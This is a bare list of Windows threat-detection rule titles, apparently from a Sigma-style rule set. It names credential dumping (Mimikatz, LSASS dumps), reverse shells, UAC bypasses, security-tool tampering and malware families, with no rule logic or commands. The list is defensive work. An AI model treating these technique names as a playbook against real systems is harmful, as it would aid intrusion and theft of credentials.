  • Set Suspicious Files as System Files Using Attrib.EXE
  • Interactive AT Job
  • Audit Policy Tampering Via NT Resource Kit Auditpol
  • Audit Policy Tampering Via Auditpol
  • Boot Configuration Tampering Via Bcdedit.EXE
  • Suspicious Child Process Of BgInfo.EXE
  • Suspicious Download From Direct IP Via Bitsadmin
  • Suspicious Download From File-Sharing Website Via Bitsadmin
  • File With Suspicious Extension Downloaded Via Bitsadmin
  • File Download Via Bitsadmin To A Suspicious Target Folder
  • Potential Data Stealing Via Chromium Headless Debugging
  • File Download with Headless Browser
  • Chromium Browser Headless Execution To Mockbin Like Site
  • Suspicious Chromium Browser Instance Executed With Custom Extension
  • Tor Client/Browser Execution
  • Suspicious Calculator Usage
  • File Download From IP Based URL Via CertOC.EXE
  • Suspicious DLL Loaded via CertOC.EXE
  • Suspicious File Downloaded From Direct IP Via Certutil.EXE
  • Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
  • Potential NTLM Coercion Via Certutil.EXE
  • Suspicious File Encoded To Base64 Via Certutil.EXE
  • File In Suspicious Location Encoded To Base64 Via Certutil.EXE
  • Process Access via TrolleyExpress Exclusion
  • Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
  • Change Default File Association To Executable Via Assoc
  • Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE
  • Curl Download And Execute Combination
  • Potential Privilege Escalation Using Symlink Between Osk and Cmd
  • VolumeShadowCopy Symlink Creation Via Mklink
  • Suspicious File Execution From Internet Hosted WebDav Share
  • Cmd.EXE Missing Space Characters Execution Anomaly
  • Potential CommandLine Path Traversal Via Cmd.EXE
  • NtdllPipe Like Activity Execution
  • Suspicious Ping/Del Command Combination
  • Copy From VolumeShadowCopy Via Cmd.EXE
  • CMSTP Execution Process Creation
  • Conhost.exe CommandLine Path Traversal
  • Control Panel Items
  • CreateDump Process Dump
  • Csc.EXE Execution Form Potentially Suspicious Parent
  • Suspicious Use of CSharp Interactive Console
  • Suspicious File Download From IP Via Curl.EXE
  • Suspicious File Download From File Sharing Domain Via Curl.EXE
  • Suspicious Curl.EXE Download
  • ManageEngine Endpoint Central Dctask64.EXE Potential Abuse
  • Suspicious Desktopimgdownldr Command
  • PowerShell Web Access Feature Enabled Via DISM
  • Dllhost.EXE Execution Anomaly
  • DLL Sideloading by VMware Xfer Utility
  • New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
  • DNS Exfiltration and Tunneling Tools Execution
  • Unusual Child Process of dns.exe
  • Potential Recon Activity Using DriverQuery.EXE
  • Suspicious Kernel Dump Using Dtrace
  • Potential Windows Defender AV Bypass Via Dump64.EXE Rename
  • Suspicious DumpMinitool Execution
  • Copying Sensitive Files with Credential Data
  • Potentially Suspicious Event Viewer Child Process
  • File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell
  • Explorer NOUACCHECK Flag
  • Findstr GPP Passwords
  • LSASS Process Reconnaissance Via Findstr.EXE
  • Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE
  • Finger.EXE Execution
  • Sysmon Driver Unloaded Via Fltmc.EXE
  • Forfiles.EXE Child Process Masquerading
  • Uncommon FileSystem Load Attempt By Format.com
  • Fsutil Suspicious Invocation
  • Potentially Suspicious GoogleUpdate Child Process
  • File Encryption/Decryption Via Gpg4win From Suspicious Locations
  • File Download Using Notepad++ GUP Utility
  • Suspicious GUP Usage
  • Remote CHM File Download/Execution Via HH.EXE
  • HTML Help HH.EXE Suspicious Child Process
  • Suspicious HH.EXE Execution
  • HackTool - ADCSPwn Execution
  • HackTool - Bloodhound/Sharphound Execution
  • HackTool - Certify Execution
  • HackTool - Certipy Execution
  • Operator Bloopers Cobalt Strike Commands
  • Operator Bloopers Cobalt Strike Modules
  • CobaltStrike Load by Rundll32
  • Potential CobaltStrike Process Patterns
  • HackTool - CoercedPotato Execution
  • HackTool - Covenant PowerShell Launcher
  • HackTool - CrackMapExec Execution
  • HackTool - CrackMapExec Execution Patterns
  • HackTool - CrackMapExec Process Patterns
  • HackTool - CrackMapExec PowerShell Obfuscation
  • HackTool - CreateMiniDump Execution
  • HackTool - EDRSilencer Execution
  • HackTool - Empire PowerShell Launch Parameters
  • Hacktool Execution - PE Metadata
  • HackTool - GMER Rootkit Detector and Remover Execution
  • HackTool - HandleKatz LSASS Dumper Execution
  • HackTool - Hashcat Password Cracker Execution
  • HackTool - Htran/NATBypass Execution
  • HackTool - Hydra Password Bruteforce Execution
  • HackTool - Potential Impacket Lateral Movement Activity
  • HackTool - Impacket Tools Execution
  • Invoke-Obfuscation CLIP+ Launcher
  • Invoke-Obfuscation Obfuscated IEX Invocation
  • Invoke-Obfuscation STDIN+ Launcher
  • Invoke-Obfuscation VAR+ Launcher
  • Invoke-Obfuscation Via Stdin
  • Invoke-Obfuscation Via Use Clip
  • Invoke-Obfuscation Via Use MSHTA
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
  • HackTool - Koadic Execution
  • HackTool - KrbRelay Execution
  • HackTool - KrbRelayUp Execution
  • HackTool - RemoteKrbRelay Execution
  • HackTool - LocalPotato Execution
  • Potential Meterpreter/CobaltStrike Activity
  • HackTool - Mimikatz Execution
  • HackTool - PCHunter Execution
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation
  • HackTool - PowerTool Execution
  • HackTool - Pypykatz Credentials Dumping Activity
  • HackTool - Quarks PwDump Execution
  • HackTool - RedMimicry Winnti Playbook Execution
  • HackTool - PPID Spoofing SelectMyParent Tool Execution
  • HackTool - SharPersist Execution
  • HackTool - SharpEvtMute Execution
  • HackTool - SharpLdapWhoami Execution
  • HackTool - SharpMove Tool Execution
  • HackTool - SharpView Execution
  • HackTool - SharpWSUS/WSUSpendu Execution
  • HackTool - SharpChisel Execution
  • HackTool - SharpImpersonation Execution
  • HackTool - SharpDPAPI Execution
  • HackTool - SILENTTRINITY Stager Execution
  • HackTool - SOAPHound Execution
  • HackTool - Stracciatella Execution
  • HackTool - TruffleSnout Execution
  • HackTool - UACMe Akagi Execution
  • HackTool - winPEAS Execution
  • HackTool - WinPwn Execution
  • HackTool - Wmiexec Default Powershell Command
  • HackTool - XORDump Execution
  • Suspicious HWP Sub Processes
  • File Download And Execution Via IEExec.EXE
  • Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location
  • Disable Windows IIS HTTP Logging
  • Microsoft IIS Service Account Password Dumped
  • Microsoft IIS Connection Strings Decryption
  • Suspicious IIS Module Registration
  • ImagingDevices Unusual Parent/Child Processes
  • Arbitrary File Download Via IMEWDBLD.EXE
  • Suspicious Shells Spawn by Java Utility Keytool
  • Suspicious Child Process Of Manage Engine ServiceDesk
  • Suspicious Processes Spawned by Java.EXE
  • Kavremover Dropped Binary LOLBIN Usage
  • Suspicious Windows Trace ETW Session Tamper Via Logman.EXE
  • Devtoolslauncher.exe Executes Specified Binary
  • Potential Manage-bde.wsf Abuse To Proxy Execution
  • Mavinject Inject DLL Into Running Process
  • MpiExec Lolbin
  • Execute MSDT Via Answer File
  • OpenWith.exe Executes Specified Binary
  • Execute Pcwrun.EXE To Leverage Follina
  • PrintBrm ZIP Creation of Extraction
  • Using SettingSyncHost.exe as LOLBin
  • Suspicious Certreq Command to Download
  • Suspicious GrpConv Execution
  • Time Travel Debugging Utility Usage
  • Visual Basic Command Line Compiler Usage
  • MMC20 Lateral Movement
  • MMC Spawning Windows Shell
  • Potential Suspicious Mofcomp Execution
  • Potential Mpclient.DLL Sideloading Via Defender Binaries
  • File Download Via Windows Defender MpCmpRun.EXE
  • Windows Defender Definition Files Removed
  • Potential Arbitrary Command Execution Using Msdt.EXE
  • Suspicious MSDT Parent Process
  • Remotely Hosted HTA File Executed Via Mshta.EXE
  • Suspicious JavaScript Execution Via Mshta.EXE
  • Potential LethalHTA Technique Execution
  • Suspicious MSHTA Child Process
  • MSHTA Suspicious Execution 01
  • Suspicious Mshta.EXE Execution Patterns
  • Potential MsiExec Masquerading
  • Potential Process Injection Via Msra.EXE
  • Suspicious Child Process Of SQL Server
  • Potential MSTSC Shadowing Activity
  • Suspicious Mstsc.EXE Execution With Local RDP File
  • Mstsc.EXE Execution From Uncommon Parent
  • Remote XSL Execution Via Msxsl.EXE
  • Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE
  • RDP Connection Allowed Via Netsh.EXE
  • RDP Port Forwarding Rule Added Via Netsh.EXE
  • New User Created Via Net.EXE With Never Expire Option
  • Suspicious Manipulation Of Default Accounts Via Net.EXE
  • Windows Internet Hosted WebDav Share Mount Via Net.EXE
  • Potential Arbitrary Code Execution Via Node.EXE
  • Network Reconnaissance Activity
  • Suspicious Driver/DLL Installation Via Odbcconf.EXE
  • Odbcconf.EXE Suspicious DLL Location
  • Potentially Suspicious DLL Registered Via Odbcconf.EXE
  • Suspicious Response File Execution Via Odbcconf.EXE
  • Potential Arbitrary File Download Using Office Application
  • Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp
  • Potentially Suspicious Office Document Executed From Trusted Location
  • OneNote.EXE Execution of Malicious Embedded Scripts
  • Suspicious Microsoft OneNote Child Process
  • Outlook EnableUnsafeClientMailRules Setting Enabled
  • Suspicious Execution From Outlook Temporary Folder
  • Suspicious Outlook Child Process
  • Suspicious Remote Child Process From Outlook
  • Suspicious Binary In User Directory Spawned From Office Application
  • Suspicious Microsoft Office Child Process
  • Ping Hex IP
  • Suspicious Plink Port Forwarding
  • Potential RDP Tunneling Via Plink
  • AADInternals PowerShell Cmdlets Execution - ProccessCreation
  • Potential AMSI Bypass Via .NET Reflection
  • Suspicious Encoded PowerShell Command Line
  • Suspicious PowerShell Encoded Command Patterns
  • Suspicious Obfuscated PowerShell Code
  • PowerShell Base64 Encoded FromBase64String Cmdlet
  • Malicious Base64 Encoded PowerShell Keywords in Command Lines
  • PowerShell Base64 Encoded IEX Cmdlet
  • PowerShell Base64 Encoded Invoke Keyword
  • Powershell Base64 Encoded MpPreference Cmdlet
  • PowerShell Base64 Encoded Reflective Assembly Load
  • Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call
  • PowerShell Base64 Encoded WMI Classes
  • Potential PowerShell Obfuscation Via Reversed Commands
  • Potential PowerShell Command Line Obfuscation
  • PowerShell Execution With Potential Decryption Capabilities
  • Powershell Defender Disable Scan Feature
  • Disable Windows Defender AV Security Monitoring
  • Disabled IE Security Features
  • Obfuscated PowerShell OneLiner Execution
  • PowerShell Download and Execution Cradles
  • Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE
  • DSInternals Suspicious PowerShell Cmdlets
  • Email Exifiltration Via Powershell
  • Base64 Encoded PowerShell Command Detected
  • PowerShell Get-Process LSASS
  • Abuse of Service Permissions to Hide Services Via Set-Service
  • Suspicious PowerShell IEX Execution Patterns
  • Root Certificate Installed From Susp Locations
  • Suspicious Invoke-WebRequest Execution
  • Malicious PowerShell Commandlets - ProcessCreation
  • Potential PowerShell Obfuscation Via WCHAR
  • Execution of Powershell Script in Public Folder
  • Tamper Windows Defender Remove-MpPreference
  • RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses
  • Potential Powershell ReverseShell Connection
  • Run PowerShell Script from ADS
  • Run PowerShell Script from Redirected Input Stream
  • PowerShell SAM Copy
  • Suspicious Service DACL Modification Via Set-Service Cmdlet
  • PowerShell Set-Acl On Windows Folder
  • PowerShell Script Change Permission Via Set-Acl
  • Deletion of Volume Shadow Copies via WMI with PowerShell
  • Exchange PowerShell Snap-Ins Usage
  • Suspicious PowerShell Download and Execute Pattern
  • Suspicious PowerShell Parameter Substring
  • Suspicious PowerShell Parent Process
  • Powershell Token Obfuscation - Process Creation
  • PowerShell DownloadFile
  • Net WebClient Casing Anomalies
  • Suspicious Provlaunch.EXE Child Process
  • PUA - 3Proxy Execution
  • PUA - AdFind Suspicious Execution
  • PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE
  • PUA - AdvancedRun Suspicious Execution
  • PUA - Chisel Tunneling Tool Execution
  • PUA - CleanWipe Execution
  • PUA - Crassus Execution
  • PUA - CsExec Execution
  • PUA - DIT Snapshot Viewer
  • PUA - DefenderCheck Execution
  • PUA - Fast Reverse Proxy (FRP) Execution
  • PUA- IOX Tunneling Tool Execution
  • PUA - Netcat Suspicious Execution
  • PUA - Ngrok Execution
  • PUA - Nimgrab Execution
  • PUA - NirCmd Execution As LOCAL SYSTEM
  • PUA - NPS Tunneling Tool Execution
  • PUA - NSudo Execution
  • PUA - PingCastle Execution From Potentially Suspicious Parent
  • PUA - Rclone Execution
  • PUA - RunXCmd Execution
  • PUA - Seatbelt Execution
  • PUA - Wsudo Suspicious Execution
  • Python Spawning Pretty TTY on Windows
  • Rar Usage with Password and Compression Level
  • Suspicious Greedy Compression Using Rar.EXE
  • Process Memory Dump via RdrLeakDiag.EXE
  • Exports Critical Registry Keys To a File
  • Imports Registry Key From an ADS
  • Regedit as Trusted Installer
  • Suspicious Registry Modification From ADS Via Regini.EXE
  • Suspicious Debugger Registration Cmdline
  • IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI
  • Potential Persistence Via Logon Scripts - CommandLine
  • Potential Credential Dumping Attempt Using New NetworkProvider - CLI
  • Python Function Execution Security Warning Disabled In Excel
  • Potential Privilege Escalation via Service Permissions Weakness
  • Potential Provisioning Registry Key Abuse For Binary Proxy Execution
  • Potential PowerShell Execution Policy Tampering - ProcCreation
  • Potentially Suspicious Regsvr32 HTTP IP Pattern
  • Suspicious Regsvr32 Execution From Remote Share
  • Potentially Suspicious Child Process Of Regsvr32
  • Regsvr32 Execution From Highly Suspicious Location
  • Regsvr32 DLL Execution With Suspicious File Extension
  • Add SafeBoot Keys Via Reg Utility
  • Suspicious Reg Add BitLocker
  • SafeBoot Registry Key Deleted Via Reg.EXE
  • Service Registry Key Deleted Via Reg.EXE
  • Security Service Disabled Via Reg.EXE
  • Dumping of Sensitive Hives Via Reg.EXE
  • LSA PPL Protection Disabled Via Reg.EXE
  • Enable LM Hash Storage - ProcCreation
  • RestrictedAdminMode Registry Value Tampering - ProcCreation
  • Potential Tampering With RDP Related Registry Keys Via Reg.EXE
  • Reg Add Suspicious Paths
  • Disabled Volume Snapshots
  • Suspicious Windows Defender Registry Key Tampering Via Reg.EXE
  • Remote Access Tool - AnyDesk Silent Installation
  • Remote Access Tool - Anydesk Execution From Suspicious Folder
  • Remote Access Tool - ScreenConnect Server Web Shell Execution
  • Renamed AdFind Execution
  • Renamed AutoIt Execution
  • Potential Defense Evasion Via Rename Of Highly Relevant Binaries
  • Renamed BrowserCore.EXE Execution
  • Renamed Cloudflared.EXE Execution
  • Renamed CreateDump Utility Execution
  • Renamed ZOHO Dctask64 Execution
  • Renamed Gpg.EXE Execution
  • Renamed Jusched.EXE Execution
  • Renamed Mavinject.EXE Execution
  • Renamed MegaSync Execution
  • Renamed Msdt.EXE Execution
  • Renamed NetSupport RAT Execution
  • Renamed NirCmd.EXE Execution
  • Renamed Office Binary Execution
  • Renamed PAExec Execution
  • Renamed PingCastle Binary Execution
  • Renamed Plink Execution
  • Potential Renamed Rundll32 Execution
  • Renamed SysInternals DebugView Execution
  • Renamed ProcDump Execution
  • Renamed PsExec Service Execution
  • Renamed Sysinternals Sdelete Execution
  • Renamed Vmnat.exe Execution
  • Potential Rundll32 Execution With DLL Stored In ADS
  • Suspicious Advpack Call Via Rundll32.EXE
  • Suspicious Rundll32 Invoking Inline VBScript
  • Suspicious Key Manager Access
  • Rundll32 Execution Without CommandLine Parameters
  • Mshtml.DLL RunHTMLApplication Suspicious Usage
  • Suspicious NTLM Authentication on the Printer Spooler Service
  • Process Memory Dump Via Comsvcs.DLL
  • Rundll32 Registered COM Objects
  • Shell32 DLL Execution in Suspicious Directory
  • RunDLL32 Spawning Explorer
  • Suspicious Control Panel DLL Load
  • Suspicious Rundll32 Execution With Image Extension
  • Suspicious Usage Of ShellExec_RunDLL
  • Suspicious ShellExec_RunDLL Call Via Ordinal
  • ShimCache Flush
  • Suspicious Rundll32 Activity Invoking Sys File
  • Rundll32 UNC Path Execution
  • Suspicious Modification Of Scheduled Tasks
  • Suspicious WebDav Client Execution Via Rundll32.EXE
  • Rundll32 Execution Without Parameters
  • Suspicious Schtasks Execution AppData Folder
  • Suspicious Scheduled Task Creation Involving Temp Folder
  • Delete Important Scheduled Task
  • Delete All Scheduled Tasks
  • Disable Important Scheduled Task
  • Schtasks From Suspicious Folders
  • Uncommon One Time Only Scheduled Task At 00:00
  • Potential Persistence Via Powershell Search Order Hijacking - Task
  • Scheduled Task Executing Encoded Payload from Registry
  • Suspicious Schtasks Schedule Types
  • Suspicious Command Patterns In Scheduled Task Creation
  • Schtasks Creation Or Modification With SYSTEM Privileges
  • Script Event Consumer Spawning Process
  • Possible Privilege Escalation via Weak Service Permissions
  • Allow Service Access Using Security Descriptor Tampering Via Sc.EXE
  • Deny Service Access Using Security Descriptor Tampering Via Sc.EXE
  • Service DACL Abuse To Hide Services Via Sc.EXE
  • Suspicious Service Path Modification
  • Sdiagnhost Calling Suspicious Child Process
  • Suspicious Serv-U Process Pattern
  • Uncommon Child Process Of Setres.EXE
  • Suspicious Splwow64 Without Params
  • Suspicious Spool Service Child Process
  • VeeamBackup Database Credentials Dump Via Sqlcmd.EXE
  • SQLite Chromium Profile Data DB Access
  • SQLite Firefox Profile Data DB Access
  • Potential RDP Tunneling Via SSH
  • Execution via stordiag.exe
  • Abused Debug Privilege by Arbitrary Parent Processes
  • User Added To Highly Privileged Group
  • User Added to Remote Desktop Users Group
  • Phishing Pattern ISO in Archive
  • Bad Opsec Defaults Sacrificial Processes With Improper Arguments
  • Suspicious Child Process Created as System
  • Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image
  • Potential Crypto Mining Activity
  • LOL-Binary Copied From System Directory
  • Potential Data Exfiltration Activity Via CommandLine Tools
  • Raccine Uninstall
  • Suspicious Parent Double Extension File Execution
  • Suspicious Download from Office Domain
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3
  • ETW Logging Tamper In .NET Processes Via CommandLine
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4
  • ETW Trace Evasion Activity
  • Suspicious Eventlog Clearing or Configuration Change Activity
  • Potentially Suspicious Execution From Parent Process In Public Folder
  • Process Execution From A Potentially Suspicious Folder
  • Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS
  • Execution Of Non-Existing File
  • Base64 MZ Header In CommandLine
  • Potential WinAPI Calls Via CommandLine
  • LSASS Dump Keyword In CommandLine
  • Non-privileged Usage of Reg or Powershell
  • Suspicious Process Patterns NTDS.DIT Exfil
  • Potentially Suspicious Call To Win32_NTEventlogFile Class
  • Suspicious Process Parents
  • Potential PowerShell Execution Via DLL
  • Privilege Escalation via Named Pipe Impersonation
  • Suspicious Program Names
  • Suspicious Process Execution From Fake Recycle.Bin Folder
  • Suspicious Redirection to Local Admin Share
  • Potential Defense Evasion Via Right-to-Left Override
  • Script Interpreter Execution From Suspicious Folder
  • Suspicious Script Execution From Temp Folder
  • Sensitive File Access Via Volume Shadow Copy Backup
  • Suspicious New Service Creation
  • Suspicious Service Binary Directory
  • Suspicious Windows Service Tampering
  • System File Execution Location Anomaly
  • Shadow Copies Deletion Using Operating Systems Utilities
  • Windows Shell/Scripting Processes Spawning Suspicious Programs
  • Suspicious SYSTEM User Process Creation
  • Tasks Folder Evasion
  • WhoAmI as Parameter
  • Execution via WorkFolders.exe
  • Suspect Svchost Activity
  • Suspicious Process Masquerading As SvcHost.EXE
  • Terminal Service Process Spawn
  • Suspicious Active Directory Database Snapshot Via ADExplorer
  • Kernel Memory Dump Via LiveKD
  • Potential SysInternals ProcDump Evasion
  • Potential LSASS Process Dump Via Procdump
  • PsExec/PAExec Escalation to LOCAL SYSTEM
  • Potential PsExec Remote Execution
  • PsExec Service Child Process Execution as LOCAL SYSTEM
  • Sysinternals PsSuspend Suspicious Execution
  • Potential File Overwrite Via Sysinternals SDelete
  • Potential Privilege Escalation To LOCAL SYSTEM
  • Uninstall Sysinternals Sysmon
  • Potential Signing Bypass Via Windows Developer Features
  • Taskkill Symantec Endpoint Protection
  • Taskmgr as LOCAL_SYSTEM
  • Suspicious TSCON Start as SYSTEM
  • Bypass UAC via CMSTP
  • Suspicious RDP Redirect Using TSCON
  • UAC Bypass Using Disk Cleanup
  • UAC Bypass Using ChangePK and SLUI
  • CMSTP UAC Bypass via COM Object Access
  • UAC Bypass Tools Using ComputerDefaults
  • UAC Bypass Using Consent and Comctl32 - Process
  • UAC Bypass Using DismHost
  • Bypass UAC via Fodhelper.exe
  • UAC Bypass Using Event Viewer RecentViews
  • UAC Bypass Using NTFS Reparse Point - Process
  • UAC Bypass via ICMLuaUtil
  • UAC Bypass Using IDiagnostic Profile
  • UAC Bypass Using IEInstal - Process
  • UAC Bypass Using MSConfig Token Modification - Process
  • UAC Bypass Using PkgMgr and DISM
  • UAC Bypass Abusing Winsat Path Parsing - Process
  • UAC Bypass Using Windows Media Player - Process
  • Bypass UAC via WSReset.exe
  • UAC Bypass WSReset
  • Suspicious UltraVNC Execution
  • Uninstall Crowdstrike Falcon Sensor
  • Uncommon Userinit Child Process
  • Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
  • VMToolsd Suspicious Child Process
  • Renamed Visual Studio Code Tunnel Execution
  • Use of W32tm as Timer
  • Wab Execution From Non Default Location
  • Wab/Wabmig Unusual Parent Or Child Processes
  • All Backups Deleted Via Wbadmin.EXE
  • Sensitive File Dump Via Wbadmin.EXE
  • Sensitive File Recovery From Backup Via Wbadmin.EXE
  • Chopper Webshell Process Pattern
  • Webshell Hacking Activity Patterns
  • Webshell Detection With Command Line Keywords
  • Suspicious Process By Web Server Process
  • Potential Credential Dumping Via WER
  • Webshell Tool Reconnaissance Activity
  • Suspicious Child Process Of Wermgr.EXE
  • Suspicious Execution Location Of Wermgr.EXE
  • Suspicious File Download From IP Via Wget.EXE
  • Suspicious File Download From File Sharing Domain Via Wget.EXE
  • Suspicious File Download From IP Via Wget.EXE - Paths
  • Whoami.EXE Execution From Privileged Process
  • Security Privileges Enumeration Via Whoami.EXE
  • Add Insecure Download Source To Winget
  • Suspicious Processes Spawned by WinRM
  • New ActiveScriptEventConsumer Created Via Wmic.EXE
  • Potential Windows Defender Tampering Via Wmic.EXE
  • Suspicious WMIC Execution Via Office Process
  • Suspicious Process Created Via Wmic.EXE
  • Potential Tampering With Security Products Via WMIC
  • Suspicious WmiPrvSE Child Process
  • UEFI Persistence Via Wpbbin - ProcessCreation
  • Cscript/Wscript Uncommon Script Extension Execution
  • Proxy Execution Via Wuauclt.EXE
  • Suspicious Windows Update Agent Empty Cmdline
  • Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths
  • Wusa.EXE Executed By Parent Process Located In Suspicious Location
  • Xwizard.EXE Execution From Non-Default Location
  • Potential NetWire RAT Activity - Registry
  • Potential Persistence Via New AMSI Providers - Registry
  • Suspicious Execution Of Renamed Sysinternals Tools - Registry
  • Folder Removed From Exploit Guard ProtectedFolders List - Registry
  • Terminal Server Client Connection History Cleared - Registry
  • Removal Of AMSI Provider Registry Keys
  • Creation of a Local Hidden User Account by Registry
  • UAC Bypass Via Wsreset
  • CMSTP Execution Registry Event
  • Disable Security Events Logging Adding Reg Key MiniNt
  • Esentutl Volume Shadow Copy Service Keys
  • Wdigest CredGuard Registry Modification
  • HybridConnectionManager Service Installation - Registry
  • Potential Qakbot Registry Activity
  • Narrator's Feedback-Hub Persistence
  • NetNTLM Downgrade Attack - Registry
  • Registry Persistence Mechanisms in Recycle Bin
  • RedMimicry Winnti Playbook Registry Manipulation
  • WINEKEY Registry Modification
  • Shell Open Registry Keys Manipulation
  • Security Support Provider (SSP) Added to LSA Configuration
  • Suspicious Run Key from Download
  • DLL Load via LSASS
  • Suspicious Camera and Microphone Access
  • Registry Persistence via Service in Safe Mode
  • Potential AMSI COM Server Hijacking
  • Bypass UAC Using Event Viewer
  • Blackbyte Ransomware Registry
  • Bypass UAC Using DelegateExecute
  • Bypass UAC Using SilentCleanup Task
  • Default RDP Port Changed to Non Standard Port
  • Sysmon Driver Altitude Change
  • Change Winevt Channel Access Permission Via Registry
  • Running Chrome VPN Extensions via the Registry 2 VPN Extension
  • Potential CobaltStrike Service Installations - Registry
  • COM Hijack via Sdclt
  • Service Binary in Suspicious Folder
  • Custom File Open Handler Executes PowerShell
  • Antivirus Filter Driver Disallowed On Dev Drive - Registry
  • Hypervisor Enforced Code Integrity Disabled
  • Hypervisor Enforced Paging Translation Disabled
  • DHCP Callout DLL Installation
  • Disabled Windows Defender Eventlog
  • Disable PUA Protection on Windows Defender
  • Potential AutoLogger Sessions Tampering
  • Disable Macro Runtime Scan Scope
  • Registry Disable System Restore
  • Windows Defender Service Disabled - Registry
  • Disable Windows Event Logging Via Registry
  • New DNS ServerLevelPluginDll Installed
  • ETW Logging Disabled In .NET Processes - Sysmon Registry
  • Directory Service Restore Mode(DSRM) Registry Value Tampering
  • Potential EventLog File Location Tampering
  • Suspicious Application Allowed Through Exploit Guard
  • Change User Account Associated with the FAX Service
  • Change the Fax Dll
  • New File Association Using Exefile
  • Add Debugger Entry To Hangs Key For Persistence
  • Persistence Via Hhctrl.ocx
  • Hide Schedule Task Via Index Value Tamper
  • Driver Added To Disallowed Images In HVCI - Registry
  • IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols
  • Uncommon Extension In Keyboard Layout IME File Registry Value
  • Suspicious Path In Keyboard Layout IME File Registry Value
  • Potential Ransomware Activity Using LegalNotice Message
  • Lolbas OneDriveStandaloneUpdater.exe Proxy Download
  • Lsass Full Dump Request Via DumpType Registry Settings
  • RestrictedAdminMode Registry Value Tampering
  • Blue Mockingbird - Registry
  • New Netsh Helper DLL Registered From A Suspicious Location
  • NET NGenAssemblyUsageLog Registry Key Tamper
  • Potentially Suspicious ODBC Driver Registered
  • Microsoft Office Protected View Disabled
  • Trust Access Disable For VBApplications
  • Python Function Execution Security Warning Disabled In Excel - Registry
  • Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting
  • Outlook Macro Execution Without Warning Setting Enabled
  • Outlook EnableUnsafeClientMailRules Setting Enabled - Registry
  • Uncommon Microsoft Office Trusted Location Added
  • Macro Enabled In A Potentially Suspicious Document
  • Office Macros Warning Disabled
  • Potential Persistence Via App Paths Default Property
  • Potential Persistence Via AutodialDLL
  • Potential Persistence Via CHM Helper DLL
  • Potential PSFactoryBuffer COM Hijacking
  • COM Object Hijacking Via Modification Of Default System CLSID Default Value
  • Potential Persistence Via GlobalFlags
  • Potential Persistence Via LSA Extensions
  • Potential Persistence Via Mpnotify
  • Potential Persistence Via Excel Add-in - Registry
  • Potential Persistence Via MyComputer Registry Keys
  • Potential Persistence Via TypedPaths
  • Potential Persistence Via Outlook Today Page
  • Potential WerFault ReflectDebugger Registry Value Abuse
  • Suspicious Shim Database Patching Activity
  • Potential Attachment Manager Settings Associations Tamper
  • Potential Persistence Via Outlook Home Page
  • Potential Persistence Via DLLPathOverride
  • Potential Persistence Via Shim Database In Uncommon Location
  • Potential Attachment Manager Settings Attachments Tamper
  • PowerShell as a Service in Registry
  • PowerShell Logging Disabled Via Registry Key Tampering
  • Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG
  • Usage of Renamed Sysinternals Tools - RegistrySet
  • Potentially Suspicious Command Executed Via Run Dialog Box - Registry
  • Tamper With Sophos AV Registry Keys
  • Hiding User Account Via SpecialAccounts Registry Key
  • Suspicious Environment Variable Has Been Registered
  • Suspicious Printer Driver Empty Manufacturer
  • Registry Persistence via Explorer Run Key
  • New RUN Key Pointing to Suspicious Folder
  • Modify User Shell Folders Startup Value
  • Enable LM Hash Storage
  • Scheduled TaskCache Change by Uncommon Program
  • Potential Registry Persistence Attempt Via Windows Telemetry
  • RDP Sensitive Settings Changed
  • New TimeProviders Registered With Uncommon DLL Name
  • Potential Signing Bypass Via Windows Developer Features - Registry
  • UAC Bypass via Event Viewer
  • UAC Bypass via Sdclt
  • UAC Bypass Abusing Winsat Path Parsing - Registry
  • UAC Bypass Using Windows Media Player - Registry
  • VBScript Payload Stored in Registry
  • Wdigest Enable UseLogonCredential
  • Execution DLL of Choice Using WAB.EXE
  • Disable Windows Defender Functionalities Via Registry Keys
  • Winlogon Notify Key Logon Persistence
  • Sysmon Configuration Error
  • Sysmon Configuration Modification
  • Sysmon Blocked Executable
  • Sysmon Blocked File Shredding
  • Suspicious Scripting in a WMI Consumer
  • Suspicious Encoded Scripts in a WMI Consumer
  • Rejetto HTTP File Server RCE
  • Adwind RAT / JRAT
  • Fireball Archer Install
  • Malware Shellcode in Verclsid Target Process
  • Potential PlugX Activity
  • StoneDrill Service Install
  • Potential APT10 Cloud Hopper Activity
  • Ps.exe Renamed SysInternals Tool
  • Equation Group C2 Communication
  • Lazarus System Binary Masquerading
  • Turla Service Install
  • Sofacy Trojan Loader Activity
  • Potential MuddyWater APT Activity
  • TropicTrooper Campaign November 2018
  • Potential BearLPE Exploitation
  • Exploiting SetupComplete.cmd CVE-2019-1378
  • Potential Baby Shark Malware Activity
  • Chafer Malware URL Pattern
  • Potential Emotet Activity
  • Formbook Process Creation
  • Potential Ryuk Ransomware Activity
  • Potential Snatch Ransomware Activity
  • Ursnif Malware Download URL Pattern
  • Potential Ursnif Malware Activity - Registry
  • APT40 Dropbox Tool User Agent
  • Potential EmpireMonkey Activity
  • Mustang Panda Dropper
  • Operation Wocao Activity
  • Operation Wocao Activity - Security
  • CVE-2020-0688 Exploitation Attempt
  • CVE-2020-0688 Exploitation via Eventlog
  • ComRAT Network Communication
